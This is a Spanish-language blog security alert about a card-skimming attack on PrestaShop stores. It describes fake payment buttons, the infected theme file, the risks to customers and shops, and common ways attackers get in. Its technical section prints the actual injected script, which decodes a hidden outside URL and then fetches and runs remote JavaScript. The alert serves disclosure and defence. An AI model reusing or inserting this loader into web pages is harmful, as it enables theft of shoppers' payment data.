Search
Menu
Search

Blog

Open sidebar

Alerta de seguridad: Detectado «Digital Skimmer» en tiendas PrestaShop

By Team Ninja
Ciberseguridad

¡Compartir es ♥️!

Recientemente hemos identificado una amenaza de seguridad crítica que afecta al ecosistema PrestaShop. Se trata de un malicious script (conocido como «digital skimmer») diseñado para interceptar y robar la información de pago de tus clientes de manera silenciosa.

¿Cómo funciona este ataque exactamente?

Este malware no bloquea tu web, sino que actúa como un parásito en el proceso de pago. Su funcionamiento se basa en el engaño visual:

  • Sustitución de botones: El script reemplaza los botones de pago legítimos de tu tienda por unos fraudulentos.
  • Redirección maliciosa: Cuando el cliente hace clic para pagar, es enviado a un formulario externo falso que imita a una pasarela bancaria real.
  • Robo de datos: El cliente introduce los datos de su tarjeta pensando que está en un entorno seguro, pero la información se envía directamente al servidor del atacante.

Análisis técnico: ¿Dónde se esconde?

El código malicioso se inserta directamente en el archivo _partials/head.tpl del tema activo de la tienda. Esto indica que el atacante ha logrado modificar archivos internos del servidor. El fragmento de código detectado es el siguiente:

<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

Este script utiliza la función atob para ocultar una URL maliciosa y descargar el código dañino en tiempo real cada vez que un usuario visita la tienda.

Riesgos para los clientes y el negocio

El impacto de este «skimming» digital es extremadamente grave:

  • Robo de identidad financiera: Los atacantes obtienen el número de tarjeta, CVV y fecha de caducidad.
  • Cargos fraudulentos: Los clientes sufrirán compras no autorizadas en sus cuentas.
  • Pérdida de reputación: Tu tienda puede ser marcada como «no segura» por navegadores y entidades bancarias, destruyendo la confianza de tus compradores.
  • Responsabilidad legal: Podrías enfrentarte a sanciones por brechas de seguridad en el tratamiento de datos sensibles (RGPD).

Versiones afectadas

Esta amenaza no depende de una versión específica de PrestaShop. Afecta a cualquier tienda (v1.7, v8.x, etc.) donde el atacante haya podido entrar debido a:

  • Módulos de terceros desactualizados o vulnerables.
  • Contraseñas de FTP o de administración débiles.
  • Permisos de archivos configurados incorrectamente en el hosting.

¿Necesitas ayuda para limpiar tu tienda o realizar una auditoría de seguridad? Contacta con nuestro equipo técnico de inmediato.

About Team Ninja

Diseñamos y posicionamos webs y servicios en buscadores. Implementamos sistemas ERP, CRM y elementos de transformación digital para empresas.
¡Dolibarr está listo para Verifactu! Garantiza el cumplimiento de la nueva normativa - Hemos adaptado todos nuestros sistemas ERP para que sean compatibles con las nuevas obligaciones de facturación electrónica en España.
Previous Post

¡Dolibarr está listo para Verifactu! Garantiza el cumplimiento de la nueva normativa

Next Post

Multiplica tus visitas y tus ventas con este sencillo ‘truco’​ para Google Analytics

Multiplica tus visitas y tus ventas con este sencillo 'truco'​ para Google Analytics - Configurar Google Analytics para registrar las búsquedas internas es fácil, gracias a ello vas a potenciar mucho tus visitas y tus ventas.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *


Close
Start typing to see posts you are looking for.
Sobre tu privacidad

Esta web utiliza cookies para que podamos ofrecerte la mejor experiencia de usuario posible. La información de las cookies se almacena en tu navegador y realiza funciones tales como reconocerte cuando vuelves a nuestra web o ayudar a nuestro equipo a comprender qué secciones de la web encuentras más interesantes y útiles.

Concretamente usamos Google Analytics y Google Tag Manager para recopilar información anónima tal como el número de visitantes del sitio, o las páginas más populares.

Dejar esta cookie activa nos permite mejorar nuestra web.

Accept More info